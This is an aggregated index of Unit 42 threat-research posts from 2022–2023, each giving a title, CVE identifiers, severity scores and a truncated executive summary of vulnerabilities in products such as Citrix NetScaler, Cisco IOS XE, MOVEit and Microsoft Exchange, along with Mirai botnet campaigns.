Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Citrix Bleed CVE-2023-4966
Unit 42
Published: November 1, 2023
High Profile Threats
Vulnerabilities
Citrix
Citrix Netscaler
CVE-2023-4966
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Aug. 14, 2025. Please refer to the Citrix website for the latest information.
On Oct. 10, 2023, Citrix published a patch for their Netscaler ADC and Netscaler Gateway products. One particular vulnerability that this patch is meant to mitigate has come to be known as Citrix Bleed ( CVE-2023-4966 ).
This nickname was given because the vulnerability can leak sensitive information from the device’s memory, which can include session tokens. Attackers can then use these credentials
Unit42
Threat Brief: Cisco IOS XE Web UI Privilege Escalation Vulnerability (Updated)
blogs_unit42·2023-10-19·CVSS 10.0
CVE-2023-20198 [CRITICAL] Threat Brief: Cisco IOS XE Web UI Privilege Escalation Vulnerability (Updated)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Cisco IOS XE Web UI Privilege Escalation Vulnerability (Updated)
Unit 42
Published: October 18, 2023
High Profile Threats
Threat Research
Vulnerabilities
Cisco
CVE-2023-20198
## Executive Summary
On Oct. 16, 2023, Cisco published a security advisory detailing an actively exploited privilege escalation zero-day vulnerability impacting Cisco IOS XE devices. The vulnerability (CVE-2023-20198) has a criticality score of 10, according to the National Vulnerability Database , and it would allow an attacker to create an account with the highest privileges possible.
According to our attack surface telemetry from Cortex Xpanse , analysts observed 22,074 implanted IOS XE devices on Oct. 18, 2023. Telemetry
Unit42
Threat Brief - MOVEit Transfer SQL Injection Vulnerabilities: CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708 (Updated Oct 4)
blogs_unit42·2023-10-04·CVSS 9.8
CVE-2023-34362 [CRITICAL] Threat Brief - MOVEit Transfer SQL Injection Vulnerabilities: CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708 (Updated Oct 4)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief - MOVEit Transfer SQL Injection Vulnerabilities: CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708 (Updated Oct 4)
Unit 42
Published: October 4, 2023
High Profile Threats
Threat Research
Vulnerabilities
CVE-2023-34362
CVE-2023-35036
CVE-2023-35708
CVE-2023-36934
MOVEit
Update October 4: We have added additional information using data gathered from Advanced Threat Prevention.
Update July 7: We cover the most recently disclosed vulnerabilities in MOVEit Transfer, as well as the July 2023 service pack.
## Executive Summary
On May 31, Progress Software posted a notification alerting customers of a critical Structured Query Language injection (SQLi) vulnerability (CVE-2023-34362) in their MOVEit Tra
Unit42
Fake CVE-2023-40477 Proof of Concept Leads to VenomRAT
blogs_unit42·2023-09-19·CVSS 9.8
CVE-2023-40477 [CRITICAL] Fake CVE-2023-40477 Proof of Concept Leads to VenomRAT
Threat Research Center
Threat Research
Vulnerabilities
## Fake CVE-2023-40477 Proof of Concept Leads to VenomRAT
Robert Falcone
Published: September 19, 2023
Malware
Threat Research
Vulnerabilities
CVE-2023-25157
CVE-2023-40477
Proof of Concept
Remote Access Trojan
Remote Code Execution
Social engineering
VenomRAT
WinRAR
## Executive Summary
Researchers should be aware of threat actors repurposing older proof of concept (PoC) code to quickly craft a fake PoC for a newly released vulnerability. On Aug. 17, 2023, the Zero Day Initiative publicly reported a remote code execution (RCE) vulnerability in WinRAR tracked as CVE-2023-40477 . They had disclosed it to the vendor on June 8, 2023. Four days after the public reporting of CVE-2023-40477, an actor using an alias of w
Unit42
When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability
blogs_unit42·2023-08-10·CVSS 8.8
CVE-2023-22952 [HIGH] When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability
Margaret Kelley
Published: August 10, 2023
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Black Hat
CVE-2023-22952
SugarCRM
Zero-day
## Executive Summary
While the SugarCRM CVE-2023-22952 zero-day authentication bypass and remote code execution vulnerability might seem like a typical exploit, there’s actually more for defenders to be aware of. Because it’s a web application, if it’s not configured or secured correctly, the infrastructure behind the scenes can allow attackers to increase their impact. When a threat actor understands the underlying technology used by cloud service provide
Unit42
Threat Brief: Multiple Vulnerabilities Including Zero-Day Remote Unauthenticated API Access – CVE-2023-35078 – in Ivanti Endpoint Manager Mobile (Updated)
blogs_unit42·2023-07-29·CVSS 9.8
CVE-2023-35078 [CRITICAL] Threat Brief: Multiple Vulnerabilities Including Zero-Day Remote Unauthenticated API Access – CVE-2023-35078 – in Ivanti Endpoint Manager Mobile (Updated)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Multiple Vulnerabilities Including Zero-Day Remote Unauthenticated API Access – CVE-2023-35078 – in Ivanti Endpoint Manager Mobile (Updated)
Unit 42
Published: July 28, 2023
High Profile Threats
Vulnerabilities
API attacks
CVE-2023-32560
CVE-2023-35078
CVE-2023-35081
CVE-2023-35082
CVE-2023-38035
Ivanti
Zero-day
## Executive Summary
Update: As of August 23, over the last three weeks this incident has developed with three additional vulnerabilities discovered in Ivanti products. The first in MobileIron Core (CVE-2023-35082; the main topic of this threat brief post when first published in July), a second vulnerability discovered in the Ivanti Avalanche product (CVE-2023-32560), and the third in
Unit42
Threat Brief: RCE Vulnerability CVE-2023-3519 on Customer-Managed Citrix Servers
blogs_unit42·2023-07-28·CVSS 8.3
CVE-2023-3519 [HIGH] Threat Brief: RCE Vulnerability CVE-2023-3519 on Customer-Managed Citrix Servers
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: RCE Vulnerability CVE-2023-3519 on Customer-Managed Citrix Servers
Unit 42
Published: July 28, 2023
High Profile Threats
Threat Research
Vulnerabilities
Citrix
Citrix Netscaler
CVE-2023-3466
CVE-2023-3467
CVE-2023-3519
## Executive Summary
On July 18, 2023, Citrix published a security bulletin for vulnerabilities affecting their NetScaler ADC and NetScaler Gateway products. When these appliances are configured as a gateway or authentication server and managed by a customer (i.e., not Citrix-managed) they can be vulnerable to remote code execution initiated by an attacker. Vulnerabilities on Citrix-managed servers have already been mitigated.
Citrix states that they have observed attacks targeti
Unit42
CVE-2023-36884 - Microsoft Office and Windows HTML Remote Code Execution: Threat Brief (Updated)
blogs_unit42·2023-07-12·CVSS 7.5
CVE-2023-36884 [HIGH] CVE-2023-36884 - Microsoft Office and Windows HTML Remote Code Execution: Threat Brief (Updated)
Threat Research Center
High Profile Threats
Vulnerabilities
## CVE-2023-36884 - Microsoft Office and Windows HTML Remote Code Execution: Threat Brief (Updated)
Unit 42
Published: July 12, 2023
High Profile Threats
Threat Research
Vulnerabilities
CVE-2023-36884
Microsoft Office
Microsoft Windows
Remote Code Execution
ROMCOM RAT
## Executive Summary
With July's Patch Tuesday release, Microsoft disclosed a zero-day Office and Windows HTML Remote Code Execution Vulnerability, CVE-2023-36884, which it rated "important" severity. Microsoft has observed active in-the-wild exploitation of this vulnerability using specially crafted Microsoft Office documents. It should be noted that exploitation requires the user to open the malicious document.
Unit 42 Threat Intelligence can co
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Threat Research Center
Trend Reports
Vulnerabilities
## IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Chao Lei
Zhibin Zhang
Yiheng An
Cecilia Hu
Published: June 22, 2023
Trend Reports
Vulnerabilities
Botnet
CVE-2019-12725
CVE-2019-17621
CVE-2019-20500
CVE-2021-25296
CVE-2021-46422
CVE-2022-27002
CVE-2022-29303
CVE-2022-30023
CVE-2022-30525
CVE-2022-31499
CVE-2022-36266
CVE-2022-40005
CVE-2022-45699
CVE-2023-1389
CVE-2023-25280
CVE-2023-27240
IoT
IoT Security
Mirai
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Pro
Unit42
Inside Win32k Exploitation: Analysis of CVE-2022-21882 and CVE-2021-1732
blogs_unit42·2023-06-20·CVSS 7.8
CVE-2022-21882 [HIGH] Inside Win32k Exploitation: Analysis of CVE-2022-21882 and CVE-2021-1732
Threat Research Center
Threat Research
Vulnerabilities
## Inside Win32k Exploitation: Analysis of CVE-2022-21882 and CVE-2021-1732
Shawn Westfall
Published: June 20, 2023
Threat Research
Vulnerabilities
CVE-2021-1732
CVE-2022-21882
Microsoft Windows
## Executive Summary
After seeing reports of two similar privilege escalation vulnerabilities in Microsoft Windows – CVE-2021-1732 and CVE-2022-21882 – we decided to analyze both to better understand the code involved in each. This is a continuation of Inside Win32k Exploitation , in which we discussed the Win32k internals and exploitation in general as background information to explore the issues surrounding CVE-2021-1732 and CVE-2022-21882 .
Here, we will dig deeper into CVE-2021-1732 and CVE-2022-21882 and their related proo
Unit42
Inside Win32k Exploitation: Background on Implementations of Win32k and Exploitation Methodologies
blogs_unit42·2023-06-13·CVSS 7.8
CVE-2021-1732 [HIGH] Inside Win32k Exploitation: Background on Implementations of Win32k and Exploitation Methodologies
Threat Research Center
Threat Research
Vulnerabilities
## Inside Win32k Exploitation: Background on Implementations of Win32k and Exploitation Methodologies
Shawn Westfall
Published: June 13, 2023
Threat Research
Vulnerabilities
CVE-2021-1732
CVE-2022-21882
Microsoft Windows
## Executive Summary
In late January 2022, several reports on social media indicated that a new Microsoft Windows privilege escalation vulnerability ( CVE-2022-21882 ) was being exploited in the wild. These reports prompted us to do an analysis of CVE-2022-21882, which turned out to be a vulnerability in the Win32k.sys user-mode callback function xxxClientAllocWindowClassExtraBytes .
In 2021, a very similar vulnerability ( CVE-2021-1732 ) was reported to – and patched by – Microsoft. We decided to take
Unit42
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
blogs_unit42·2023-05-25·CVSS 9.8
CVE-2023-26801 [CRITICAL] Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Threat Research Center
Trend Reports
Vulnerabilities
## Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Published: May 25, 2023
Trend Reports
Vulnerabilities
CVE-2023-26801
CVE-2023-26802
CVE-2023-27076
IoT
IZ1H9
Mirai variant
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
CVE-2023-27076 : Tenda G103 command injection vulnerability
CVE-2023-26801 : LB-Link command injection vulnerability
CVE-2023-26802 : DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerabilit
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02·CVSS 9.8
CVE-2021-22005 [CRITICAL] Network Security Trends: November 2022-January 2023
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: November 2022-January 2023
Yiheng An
Published: May 2, 2023
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-22005
CVE-2021-31602
CVE-2021-33035
CVE-2021-43287
CVE-2022-1118
CVE-2022-27924
CVE-2022-30136
CVE-2022-31137
CVE-2022-44877
CVE-2022-46169
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
Roxy-WI, a web interface for managing and monitoring RoxyDNS
CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
Cacti, an open-source netw
Unit42
Threat Brief - CVE-2023-23397 - Microsoft Outlook Privilege Escalation
blogs_unit42·2023-03-31·CVSS 9.8
CVE-2023-23397 [CRITICAL] Threat Brief - CVE-2023-23397 - Microsoft Outlook Privilege Escalation
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief - CVE-2023-23397 - Microsoft Outlook Privilege Escalation
Unit 42
Published: March 31, 2023
High Profile Threats
Threat Research
Vulnerabilities
CVE-2023-23397
Email compromise
Microsoft Outlook
Microsoft Vulnerability
## Executive Summary
On March 14, 2023, Microsoft released a patch for CVE-2023-23397 . CVE-2023-23397 is a vulnerability in the Windows Microsoft Outlook client that can be exploited by sending a specially crafted email that triggers automatically when it is processed by the Outlook client. No user interaction is required to trigger the exploit.
Exploitation of the vulnerability will leak the targeted user’s Net-NTLMv2 hashes. This could then be used to conduct relay attacks to ot
Unit42
Mirai Variant V3G4 Targets IoT Devices
blogs_unit42·2023-02-15·CVSS 7.5
[HIGH] Mirai Variant V3G4 Targets IoT Devices
Threat Research Center
Threat Research
Vulnerabilities
## Mirai Variant V3G4 Targets IoT Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Aveek Das
Published: February 15, 2023
Threat Research
Vulnerabilities
Botnet
IoT Vulnerability
Mirai variant
V3G4
## Content Warning
We are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.
## Executive Summary
From July to December 2022, Unit 42 researchers observed a Mirai variant called V3G4, which was leveraging several vulnerabilities to spread itself. The vulnerabilities exploited include the following:
CV
Unit42
Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
blogs_unit42·2023-01-24·CVSS 9.8
CVE-2021-35394 [CRITICAL] Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
Threat Research Center
Threat Research
Vulnerabilities
## Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
Yiheng An
Chao Lei
Adam Robbie
Aveek Das
Zhibin Zhang
Shehroze Farooqi
Published: January 24, 2023
Threat Research
Vulnerabilities
Botnet
CVE-2021-35394
Exploit in the wild
IoT Vulnerability
Network security trends
Supply chain
## Executive Summary
Unit 42 researchers review tens of millions of attack records every month, and most months, attacks targeting a single vulnerability do not exceed 10% of the total number of attacks. However, we discovered that between August and October 2022 , the number of attacks attempting to exploit a Realtek Jungle SDK remote code execution vulnerability ( CVE-2021-35394 ) accounted for more than 40% of the
Unit42
Network Security Trends: August-October 2022
blogs_unit42·2023-01-12·CVSS 9.8
[CRITICAL] Network Security Trends: August-October 2022
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: August-October 2022
Yiheng An
Published: January 12, 2023
Trend Reports
Vulnerabilities
Attack analysis
Exploit in the wild
Network security trends
Proof of Concept
## Executive Summary
Recent August-October 2022 observations of exploits used in the wild reveal that threat actors have been leveraging significant numbers of attacks against the Realtek Jungle SDK remote code execution vulnerability (CVE-2021-35394).
In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based on proof-of-concept (PoC) availability and impact. We have detailed below which of these we believe should be on a defender’s radar.
Other insights that could assist defenders
Unit42
Security Issue in JWT Secret Poisoning (Updated)
blogs_unit42·2023-01-09
CVE-2022-23529 Security Issue in JWT Secret Poisoning (Updated)
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## Security Issue in JWT Secret Poisoning (Updated)
Artur Oleyarsh
Published: January 9, 2023
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2022-23529
Exploit
Open source
Remote Code Execution
Vulnerability Exploitation
## Updates
Jan. 30, 2023
After hearing the community's feedback about the prerequisites of the exploitation scenario of the vulnerability, we made the decision to work with Auth0 to retract CVE-2022-23529.
The security issue described in this blog remains a concern when the JsonWebToken library is used in an insecure way. In that scenario, if all the prerequisites are met, the issue may be exploitable. We agree that the source of this risk in that case will be in the
Unit42
Threat Brief: OWASSRF Vulnerability Exploitation
blogs_unit42·2022-12-23·CVSS 8.8
CVE-2022-41080 [HIGH] Threat Brief: OWASSRF Vulnerability Exploitation
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: OWASSRF Vulnerability Exploitation
Robert Falcone
Lior Rochberger
Published: December 22, 2022
High Profile Threats
Vulnerabilities
Backdoor
CVE-2022-41080
CVE-2022-41082
Microsoft Exchange Server
OWASSRF
ProxyNotShell
SilverArrow
## Executive Summary
On Dec. 20, 2022, CrowdStrike published a blog discussing a new exploit method for Microsoft Exchange Server, which they named OWASSRF, referring to server-side request forgery in relation to Outlook on the web. (Outlook on the web is known as both Outlook Web Access and Outlook Web Application.)
The OWASSRF exploit method involves two different vulnerabilities tracked by CVE-2022-41080 and CVE-2022-41082 that allow remote code execution (RCE) v
Unit42
Vice Society: Profiling a Persistent Threat to the Education Sector
blogs_unit42·2022-12-06·CVSS 7.8
CVE-2021-1675 [HIGH] Vice Society: Profiling a Persistent Threat to the Education Sector
Threat Research Center
Threat Research
Ransomware
## Vice Society: Profiling a Persistent Threat to the Education Sector
JR Gumarin
Published: December 6, 2022
Ransomware
Threat Research
Vulnerabilities
CVE-2021-1675
CVE-2021-34527
HelloKitty
NGFW
PrintNightmare
Twinkling Scorpius
Vice Society
## Executive Summary
Vice Society is a ransomware gang that has been involved in high-profile activity against schools this year. Unlike many other ransomware groups such as LockBit that follow a typical ransomware-as-a-service (RaaS) model, Vice Society’s operations are different in that they’ve been known for using forks of pre-existing ransomware families in their attack chain that are sold on DarkWeb marketplaces. These include the HelloKitty (aka FiveHands) and Zeppelin stra
Unit42
Network Security Trends: May-July 2022
blogs_unit42·2022-11-16
Network Security Trends: May-July 2022
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: May-July 2022
Yiheng An
Published: November 16, 2022
Trend Reports
Vulnerabilities
Attack analysis
Exploit in the wild
Network security trends
## Executive Summary
Recent May-July 2022 observations of network security trends and exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities. In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based on proof-of-concept (PoC) availability and impact. We have detailed below which of these we believe should be on the defender’s radar.
Other insights that could assist defenders include the following:
Rankings of the most commonly used att
Unit42
Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server
blogs_unit42·2022-11-10·CVSS 5.8
CVE-2022-0072 [MEDIUM] Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server
Threat Research Center
Threat Research
Vulnerabilities
## Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server
Artur Avetisyan
Published: November 10, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
CVE-2022-0072
CVE-2022-0073
CVE-2022-0074
Exploit
Openlitespeed
Privilege escalation
Remote Code Execution
Web server
## Executive Summary
The Unit 42 research team has researched and discovered three different vulnerabilities in the open source OpenLiteSpeed Web Server . These vulnerabilities also affect the enterprise version, LiteSpeed Web Server . By chaining and exploiting the vulnerabilities, adversaries could compromise the web server and gain fully privileged remote code execution. The vulnerabilities discovered include:
Re
Unit42
Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows
blogs_unit42·2022-11-03·CVSS 7.5
CVE-2022-3786 [HIGH] Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows
Shawn Westfall
Published: November 2, 2022
High Profile Threats
Vulnerabilities
Buffer Overflow
CVE-2022-3602
CVE-2022-3786
Network security
OpenSSL
## Executive Summary
On November 1, 2022, OpenSSL released a security advisory describing two high severity vulnerabilities within the OpenSSL library ( CVE-2022-3786 and CVE-2022-3602 ). OpenSSL versions from 3.0.0 - 3.0.6 are vulnerable, with 3.0.7 containing the patch for both vulnerabilities. OpenSSL 1.1.1 and 1.0.2 are not affected by this issue.
In the days leading up to the security advisory, many were saying these vulnerabilities had the potential to be as bad as the Heartbleed
Unit42
Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)
blogs_unit42·2022-10-04·CVSS 6.6
CVE-2022-41040 [MEDIUM] Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)
Shawn Westfall
Published: October 4, 2022
High Profile Threats
Vulnerabilities
CVE-2022-41040
CVE-2022-41082
Exploit in the wild
Microsoft Exchange Server
ProxyNotShell
Threat intelligence
## Executive Summary
In early August, GTSC discovered a new Microsoft Exchange zero-day remote code execution (RCE) that was very similar to ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207).
The exploit was discovered in the wild in what appeared to be a SOC investigation into suspicious activity of one of GTSC’s customers. Once they determined the scope of the vulnerabilities, GTSC reported the vulnerability to the Zer
Unit42
Zero-Day Exploit Detection Using Machine Learning
blogs_unit42·2022-09-16
Zero-Day Exploit Detection Using Machine Learning
Threat Research Center
Threat Research
Vulnerabilities
## Zero-Day Exploit Detection Using Machine Learning
Jin Chen
Lei Xu
Andrew Guan
Zhibin Zhang
Yu Fu
Published: September 16, 2022
Threat Research
Vulnerabilities
Command injection
Deep learning
Machine Learning
Network security
SQL injection
Threat detection
Zero-days
## Executive Summary
Code injection is an attack technique widely used by threat actors to launch arbitrary code execution on victim machines through vulnerable applications. In 2021, the Open Web Application Security Project (OWASP) ranked it as third in the top 10 web application security risks .
Given the popularity of code injection in exploits, signatures with pattern matches are commonly used to identify the anomalies in network traffic (mos
Unit42
Mirai Variant MooBot Targeting D-Link Devices
blogs_unit42·2022-09-06·CVSS 9.8
CVE-2015-2051 [CRITICAL] Mirai Variant MooBot Targeting D-Link Devices
Threat Research Center
Threat Research
Vulnerabilities
## Mirai Variant MooBot Targeting D-Link Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Aveek Das
Published: September 6, 2022
Malware
Threat Research
Vulnerabilities
CVE-2015-2051
CVE-2018-6530
CVE-2022-26258
CVE-2022-28958
IoT
Mirai
MooBot
SOHO
## Executive Summary
In early August, Unit 42 researchers discovered attacks leveraging several vulnerabilities in devices made by D-Link, a company that specializes in network and connectivity products. The vulnerabilities exploited include:
CVE-2015-2051 : D-Link HNAP SOAPAction Header Command Execution Vulnerability
CVE-2018-6530 : D-Link SOAP Interface Remote Code Execution Vulnerability
CVE-2022-26258 : D-Link Remote Command Execution Vulnerability
CVE-2022-28958 :
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42·2022-08-19·CVSS 8.8
CVE-2021-20166 [HIGH] Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
Yue Guan
Published: August 19, 2022
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-20166
CVE-2021-20167
CVE-2021-21881
CVE-2021-24762
CVE-2021-28169
CVE-2021-31589
CVE-2021-39226
CVE-2021-4045
CVE-2021-43711
CVE-2022-21371
CVE-2022-21662
CVE-2022-22536
CVE-2022-22947
CVE-2022-22954
CVE-2022-22963
CVE-2022-22965
CVE-2022-24112
CVE-2022-24260
CVE-2022-25060
CVE-2022-25075
CVE-2022-25134
CVE-2022-27226
CVE-2022-29464
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use
Unit42
Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
blogs_unit42·2022-07-27·CVSS 9.8
CVE-2022-26809 [CRITICAL] Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
Chao Lei
Tao Yan
Haozhe Zhang
Qi Deng
Published: July 27, 2022
High Profile Threats
Vulnerabilities
CVE-2022-26809
CVE-2022-26923
CVE-2022-26925
Microsoft
Microsoft Windows
## Executive Summary
Microsoft introduced patches for several critical vulnerabilities in their April and May 2022 security updates, including the following vulnerabilities:
CVE-2022-26809 : An unauthorized attacker can exploit this vulnerability by sending a specially crafted Remote Procedure Call (RPC) to remotely execute arbitrary code on the vulnerable device.
CVE-2022-26923 : A low-privileged user can escalate privilege to a domain ad
Unit42
Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
blogs_unit42·2022-07-26
Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
Threat Research Center
Trend Reports
Vulnerabilities
## Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
Unit 42
Published: July 26, 2022
Trend Reports
Vulnerabilities
Apache Log4j
ProxyLogon
ProxyShell
SonicWall RCE
Unit 42 Incident Response Report
Zero-day
Zoho ManageEngine
## Executive Summary
Software vulnerabilities remain a key avenue of initial access for attackers according to the 2022 Unit 42 Incident Response Report . While this underscores the need for organizations to operate with a well-defined patch management strategy, we’ve observed that attackers are increasingly quick to exploit high-profile zero-day vulnerabilities, further increasing the time pressure on organizations when a new vulnera
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8
CVE-2017-5638 [CRITICAL] Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Threat Research Center
Trend Reports
Vulnerabilities
## Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Unit 42
Published: July 21, 2022
Trend Reports
Vulnerabilities
Apache Log4j
CVE-2017-5638
CVE-2017-9841
CVE-2018-19986
CVE-2019-02320
CVE-2019-19597
CVE-2019-9082
CVE-2020-14882
CVE-2020-14883
CVE-2020-15505
CVE-2020-15506
CVE-2020-25078
CVE-2020-5902
CVE-2021-21315
CVE-2021-22986
CVE-2021-26855
CVE-2021-31805
CVE-2021-34473
CVE-2021-35464
CVE-2021-38647
CVE-2021-40438
CVE-2021-40539
CVE-2021-41773
CVE-2021-42013
CVE-2021-44228
CVE-2021-45046
CVE-2022-22963
CVE-2022-22965
Network security trends
Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are repo
Unit42
FabricScape: Escaping Service Fabric and Taking Over the Cluster
blogs_unit42·2022-06-28·CVSS 6.7
CVE-2022-30137 [MEDIUM] FabricScape: Escaping Service Fabric and Taking Over the Cluster
Threat Research Center
Threat Research
Vulnerabilities
## FabricScape: Escaping Service Fabric and Taking Over the Cluster
Aviv Sasson
Published: June 28, 2022
Threat Research
Vulnerabilities
Azure
Container escape
Containers
Fabricscape
Privilege escalation
Service Fabric
## Executive Summary
Unit 42 researchers identified FabricScape (CVE-2022-30137), a vulnerability of important severity in Microsoft’s Service Fabric – commonly used with Azure – that allows Linux containers to escalate their privileges in order to gain root privileges on the node, and then compromise all of the nodes in the cluster. The vulnerability could be exploited on containers that are configured to have runtime access , which is granted by default to every container.
Service Fabric hosts more
Unit42
Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) (Updated)
blogs_unit42·2022-06-04·CVSS 9.8
CVE-2022-26134 [CRITICAL] Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) (Updated)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) (Updated)
Abhishek Anbazhagan
Shawn Westfall
Josh Grunzweig
Daniela Shalev
Eli Barr
Published: June 3, 2022
High Profile Threats
Threat Research
Vulnerabilities
Confluence Server and Data Center
CVE-2022-26134
Remote Code Execution
## Executive Summary
On June 2, Volexity reported that over Memorial Day weekend, they identified suspicious activity on two internet-facing servers running Atlassian’s Confluence Server application. After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center. The details were reported t
Unit42
Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
blogs_unit42·2022-05-31·CVSS 7.8
CVE-2022-30190 [HIGH] Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: CVE-2022-30190 – MSDT Code Execution Vulnerability
Shawn Westfall
Published: May 31, 2022
High Profile Threats
Vulnerabilities
CVE-2022-30190
Follina
Microsoft Office
Remote Code Execution
Zero-click
## Executive Summary
On May 27, 2022, details began to emerge of malicious Word documents leveraging remote templates to execute PowerShell via the ms-msdt Office URL protocol. The use of this technique appeared to allow attackers to bypass local Office macro policies to execute code within the context of Word. Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.
Due to the amount of publicly available information, ease of use, and the extreme effective
Unit42
Network Security Trends: November 2021 to January 2022
blogs_unit42·2022-05-31
Network Security Trends: November 2021 to January 2022
Threat Research Center
Threat Research
Vulnerabilities
## Network Security Trends: November 2021 to January 2022
Yue Guan
Published: May 31, 2022
Threat Research
Vulnerabilities
Apache Log4j
Attack analysis
Denial of service
Exploit in Wild
Network security trends
## Executive Summary
Unit 42 researchers continually observe network attacks and search for insights that can assist defenders. Here, we summarize key trends from November 2021 to January 2022. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity distribution. We also classify vulnerabilities to provide a clear view of the prevalence of, for example, cross-site scripting or denial of service.
Cross-site scripting stood out as a commonly used t
Unit42
Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
blogs_unit42·2022-05-20·CVSS 9.8
CVE-2022-22954 [CRITICAL] Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
Threat Research Center
High Profile Threats
